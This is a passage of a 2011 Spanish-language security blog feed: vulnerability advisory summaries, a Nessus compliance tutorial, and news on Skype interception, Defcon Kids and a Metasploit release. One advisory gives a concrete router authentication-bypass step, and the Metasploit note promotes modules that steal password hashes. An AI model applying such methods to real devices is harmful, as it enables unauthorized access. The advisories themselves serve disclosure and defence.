Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48438/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48438/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.25 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: phpMyAdmin "$_SESSION" Array Unauthorized Access Vulnerability&lt;br /&gt;
Description: phpMyAdmin is a web-based administration interface for MySQL databases. The application is exposed to an unauthorized access issue.&amp;nbsp; Specifically, an attacker can manipulate the global "$_SESSION"&lt;br /&gt;
array to specify arbitrary values. This may aid the attacker in performing various other attacks, including remote code execution.&lt;br /&gt;
phpMyAdmin 3.4.0 is vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48480/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48480/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.26 CVE: Not Available&lt;br /&gt;
Platform: Network Device&lt;br /&gt;
Title: IBM Web Application Firewall Security Bypass&lt;br /&gt;
Description: IBM Web Application Firewall is a security application. The application is exposed to a security bypass issue.&amp;nbsp; An attacker could exploit the issue through HTTP Parameter Pollution by submitting repeated occurrences of the same parameter.&amp;nbsp; IBM Web Application Firewall, IBM Security Server are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.27 CVE: Not Available&lt;br /&gt;
Platform: Network Device&lt;br /&gt;
Title: H3C ER5100 Authentication Bypass Vulnerability&lt;br /&gt;
Description: The H3C ER5100 is a dual-core broadband router. The appliance is exposed to a remote authentication bypass issue. The issue can be exploited by appending a "userLogin.asp" string in the URL to gain administrative access. 3Com H3C ER5100 is affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.wooyun.org/bugs/wooyun-2010-02268"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.wooyun.org/bugs/wooyun-2010-02268&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;/span&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-362080759413000368?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/resumen-de-vulnerabilidades-semana-27.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-7098642505593598170</guid><pubDate>Thu, 30 Jun 2011 15:13:00 +0000</pubDate><atom:updated>2011-06-30T11:13:04.021-04:00</atom:updated><title>Legal Intercept - $kype</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="tab-stops: 61.5pt;"&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://www.abc.es/20110629/tecnologia/abci-microsoft-skype-legal-intercept-201106291555.html"&gt;&lt;span style="font-size: 10.0pt;"&gt;Microsoft grabará de forma legal las llamadas de voz y vídeo de Skype para ampliar las posibilidades de seguimiento de conversaciones delictivas terroristas en línea.&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;em&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; font-style: normal; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Microsoft ha patentado «Legal Intercept», una tecnología que le permitirá interceptar y monitorizar de forma legal llamadas de voz y vídeo de&lt;/span&gt;&lt;/em&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://www.skype.com/intl/es/home/"&gt;&lt;span style="font-size: 10.0pt;"&gt;Skype&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;em&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; font-style: normal; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;, servicio que adquirió en mayo por 8.500 millones de dólares. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/em&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="tab-stops: 61.5pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="tab-stops: 61.5pt;"&gt;&lt;em&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; font-style: normal; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Microsoft la describe como una herramienta similar a la que las empresas de telecomunicaciones utilizan para cumplir con las exigencias gubernamentales en materia de seguridad. Skype pasa de este modo a entrar en el&lt;/span&gt;&lt;/em&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://en.wikipedia.org/wiki/Communications_Assistance_for_Law_Enforcement_Act"&gt;&lt;span style="font-size: 10.0pt;"&gt;CALEA&lt;/span&gt;&lt;/a&gt; &lt;/span&gt;&lt;em&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; font-style: normal; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;(Communications Assistance for Law Enforcement Act), que hace a las empresas de tecnologías de la comunicación puedan ser controladas, siempre por motivos de seguridad y de estado. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/em&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="tab-stops: 61.5pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="tab-stops: 61.5pt;"&gt;&lt;em&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; font-style: normal; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;A pesar del fin de «Legal Intercept» que ha explicado el gigante de Redmond, la patente ha generado cierto temor entre los internautas en materia de privacidad, como se puede observar en diversos blogs y foros, además de en&lt;/span&gt;&lt;/em&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://twitter.com/#!/search/skype%20microsoft"&gt;&lt;span style="font-size: 10.0pt;"&gt;Twitter&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;em&gt;&lt;span style="color: black; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; font-style: normal; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;, donde abundan los mensajes de alarma&lt;/span&gt;.&lt;/em&gt;&lt;span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-7098642505593598170?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/06/legal-intercept-kype.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-4018647220378744751</guid><pubDate>Thu, 30 Jun 2011 14:03:00 +0000</pubDate><atom:updated>2011-06-30T10:04:05.775-04:00</atom:updated><title>Compliance with Nessus</title><description>&lt;div class="mobile-photo"&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Una de las características que ofrece la versión &lt;a href="http://www.tenable.com/products/nessus-professionalfeed"&gt;ProfessionalFeed&lt;/a&gt; (la de pago, vamos: $1200 al año cada licencia) de Nessus —entre otras— es la posibilidad de realizar &lt;a href="http://www.tenable.com/products/nessus-professionalfeed/policy-compliance-checks"&gt;auditorías de cumplimiento&lt;/a&gt; a sistemas Unix y Windows, aplicaciones o bases de datos SQL basadas en estándares ya predefinidos.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Así pues, podremos realizar auditorías de cumplimiento basándonos en las recomendaciones &lt;a href="http://www.cert.org/"&gt;CERT&lt;/a&gt;, guías de buenas prácticas &lt;a href="http://www.cisecurity.org/"&gt;CIS&lt;/a&gt; o &lt;a href="http://www.nsa.gov/"&gt;NSA&lt;/a&gt;, requerimientos de configuración PCI , e incluso &lt;a href="http://www.digitalbond.com/tools/bandolier/"&gt;Bandolier&lt;/a&gt; (proyecto de &lt;a href="http://www.digitalbond.com/tools/the-rack/nessus/"&gt;Digital Bond&lt;/a&gt;) proporciona políticas de cumplimiento (a través de ficheros .audit de los cuales hablaremos a continuación) para auditar sistemas SCADA, &lt;a href="http://es.wikipedia.org/wiki/DCS"&gt;DCS&lt;/a&gt; y otras aplicaciones de sistemas de control industrial, entre otros.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;El cumplimiento o no cumplimiento de dichas recomendaciones viene predefinido por los ya mencionados ficheros de extensión .audit que ofrece Tenable a través de su &lt;a href="https://support.tenable.com/"&gt;centro de soporte&lt;/a&gt;. Podemos descargarnos diversos ficheros .audit que nos definan por ejemplo políticas de auditorías desarrolladas por Tenable para auditar sistemas Windows, Linux, HP-UX, Solaris y AIX para comprobar el cumplimiento de unos requerimientos de configuración mínimos establecidos según el estándar PCI, políticas de cumplimiento basadas en las mejores prácticas según Cisco para la configuración de sus dispositivos o incluso políticas de auditoría que analizan la presencia de contenido “sensible” en los sistemas a auditar (contenido para adultos, información corporativa confidencial, números de tarjetas de crédito, etc.) por citar algunos ejemplos.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Por ejemplo si queremos auditar un dispositivo Cisco según las propias recomendaciones sobre buenas prácticas de Cisco usaríamos el fichero .audit correspondiente. Veamos una posible puesta en escena. El primer paso es crearnos nuestra política:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/--MQDRlsFMPE/TgyBw9KpvxI/AAAAAAAAAHw/bMTV4ltP9NE/s1600/nessus_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://3.bp.blogspot.com/--MQDRlsFMPE/TgyBw9KpvxI/AAAAAAAAAHw/bMTV4ltP9NE/s400/nessus_1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Descargamos el fichero .audit correspondiente del centro de soporte. En este caso a modo de ejemplo usaremos Cumplimiento_Cisco_Level_2.audit: fichero que implementa las recomendaciones de configuración de nivel 2 según el &lt;a href="https://www.cisecurity.org/tools2/cisco/CIS_Cisco_IOS_Benchmark_v2.4.0.pdf"&gt;CIS Cisco IOS Benchmark v2.4.0&lt;/a&gt;. En la descripción del fichero .audit además indica que es necesario que toda la familia de plugins de Cisco esté habilitada, así que no debemos olvidarnos de habilitar el plugin correspondiente a Cisco dentro de la familia de plugins del cumplimiento de las políticas:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-6AGajyCd1xA/TgyBxpzy2tI/AAAAAAAAAH0/LQNAMPZ6SHw/s1600/nessus_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="232" src="http://4.bp.blogspot.com/-6AGajyCd1xA/TgyBxpzy2tI/AAAAAAAAAH0/LQNAMPZ6SHw/s400/nessus_2.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;A continuación en &lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;Preferencias&lt;/span&gt;&lt;/em&gt; cargamos el fichero .audit que hemos descargado previamente seleccionando el plugin ‘Cisco IOS Compliance Checks’; como vemos permite incluir hasta cinco ficheros .audit de política de Cisco que permiten verificar si dispositivo con Cisco IOS está configurado conforme a los estándares de seguridad indicados en las políticas cargadas:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-JybWkOHdZUk/TgyBxwYYfQI/AAAAAAAAAH4/wSE582EQtOI/s1600/nessus_3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="238" src="http://1.bp.blogspot.com/-JybWkOHdZUk/TgyBxwYYfQI/AAAAAAAAAH4/wSE582EQtOI/s400/nessus_3.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;De este modo tan simple, ya tendríamos la política creada para auditar nuestro dispositivo y ver si cumple con las recomendaciones que el proveedor nos da. &lt;br /&gt;
&lt;br /&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Si nuestra empresa dispone de su propia política de seguridad en cuanto a configuraciones de servidores por ejemplo podemos editar nuestro propio fichero .audit para realizar la auditoría de cumplimiento de acuerdo a nuestra propia política. Asimismo, en el centro de soporte de Nessus se proporcionan también diversas Tools (i2a, c2a, p2a) para generar nuestros propios ficheros .audit a partir de otros ficheros. Así, por ejemplo podemos generar ficheros .audit a partir de ficheros .inf de Windows. por citar un ejemplo. Para aquellos interesados, Tenable proporciona información al respecto de la creación de ficheros .audit en su centro de soporte e invita a que los usuarios interesados visiten los foros de discusión del producto.&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: x-small;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: x-small;"&gt;&lt;span style="font-size: 10pt;"&gt;Fuente: Maite Moreno – SAW&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-4018647220378744751?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/06/cumplimiento-con-nessus.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/--MQDRlsFMPE/TgyBw9KpvxI/AAAAAAAAAHw/bMTV4ltP9NE/s72-c/nessus_1.jpg" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-7882672465925001245</guid><pubDate>Sat, 25 Jun 2011 18:31:00 +0000</pubDate><atom:updated>2011-06-25T14:31:25.414-04:00</atom:updated><title>Defcon Kid - Los futuros Sombreros Blancos</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;b&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;CUANDO TOMAREMOS ESTAS INICITAIVAS EN CHILE…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Niños entre 8 y 16 años se reunirán en Las Vegas en agosto para un inusual “campamento de verano” en el que aprenderán a ser hackers (de los buenos, que no roban, ni hacen trampa ni cometen crímenes). Se trata de la primera Defcon infantil, que enseñará a los chicos las habilidades de los hackers, además de enseñarles a protegerse de ciberataques.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;También será la oportunidad para que el gobierno de Estados Unidos &amp;nbsp;identifique posibles talentos para la próxima generación de policía cibernética. La Defcon normal funciona ya hoy en día como un lugar donde la policía, agentes de inteligencia, militares y otros reclutan miembros talentosos.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;La conferencia se realizará en paralelo a la Defcon adulta, entre el 6 y 7 de agosto. La idea principal es convencer a los niños que está bien ser un hacker de “&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;a href="http://es.wikipedia.org/wiki/Hacker#White_hat_y_black_hat"&gt;&lt;span lang="ES" style="mso-ansi-language: ES;"&gt;sombrero blanco&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;” (como se le llama a los buenos), que usan sus habilidades para combatir crímenes. Los hackers de “sombrero negro” (también crackers, o hackers maliciosos) en cambio son los que usan sus habilidades para robar dinero, identidades y otros crímenes.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;Este tema ha estado en la palestra fuertemente en los últimos meses con bullados casos de hackeos como lo que le ocurrió a &lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;a href="http://www.fayerwayer.com/2011/04/sony-confirma-que-los-hackers-robaron-informacion-de-usuarios/"&gt;&lt;span lang="ES" style="mso-ansi-language: ES;"&gt;Sony con la PSN&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;, a &lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;a href="http://www.fayerwayer.com/2011/05/ciberataque-contra-el-principal-proveedor-de-armas-de-los-estados-unidos/"&gt;&lt;span lang="ES" style="mso-ansi-language: ES;"&gt;Lockheed Martin&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt; y &lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;a href="http://www.fayerwayer.com/2011/06/compania-rsa-admite-que-los-tokens-securid-resultaron-comprometidos-luego-de-que-sus-sistemas-fueran-hackeados/"&gt;&lt;span lang="ES" style="mso-ansi-language: ES;"&gt;RSA&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;, FMI, HYDOAYSEN, GOBIERNO DE CHILE entre otros y los movimientos de &lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;a href="http://www.fayerwayer.com/tag/lulzsec/"&gt;&lt;span lang="ES" style="mso-ansi-language: ES;"&gt;LulzSec&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt;"&gt;Esperemos que alguna entidad gubernamental, empresas o ISP tomen la iniciativa para que en fututo conozcamos a nuestros nuevos partners de seguridad y talentos informáticos.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-7882672465925001245?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/06/defcon-kid-los-futuros-sombreros.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-1324356583073016521</guid><pubDate>Tue, 21 Jun 2011 18:40:00 +0000</pubDate><atom:updated>2011-06-21T14:40:30.374-04:00</atom:updated><title>Release Metasploit Framework 3.7.2</title><description>&lt;div class="mobile-photo"&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;Desde Metasploit nos informan del Nuevo release de esta incredible herramienta:&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="mobile-photo"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US;"&gt;It's that time again! The Metasploit team is proud to announce the immediate release of the &lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;a href="http://metasploit.com/download/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;latest version&lt;/span&gt;&lt;/a&gt; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US;"&gt;of the Metasploit Framework, 3.7.2. Today's release includes eleven new exploit modules and fifteen post modules for your pwning pleasure. Adding to Metasploit's well-known hashdump capabilities, now you can easily steal password hashes from Linux, OSX, and Solaris. As an added bonus, if any of the passwords were hashed with crypt_blowfish (which is the default on some Linux distributions) any time since 1998, &lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;a href="http://www.openwall.com/lists/oss-security/2011/06/20/2"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;they may be considerably easier to crack&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US;"&gt;. For more cracking fun, Maurizio Agazzini and Mubix's hard work has paid off in a new cachedump module. As the name implies, cachedump allows you to steal Windows cached password hashes. They can't be used directly like those obtained with hashdump, but &lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;a href="http://www.room362.com/blog/2011/2/14/cachedump-for-meterpreter-in-action.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;JtR can crack them&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US;"&gt;. If cracking sounds hard regardless of 13 year old bugs and proprietary hash algorithms, you might be interested in the latest post modules from TheLightCosine: they steal passwords from several applications which conveniently store them for lazy users in what is &lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;a href="http://cosine-security.blogspot.com/2011/06/stealing-password-from-mremote.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;equivalent to plaintext&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US;"&gt;.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="min-height: 8pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="min-height: 8pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US;"&gt;Metasploit gets better every day.&lt;br /&gt;
&lt;br /&gt;
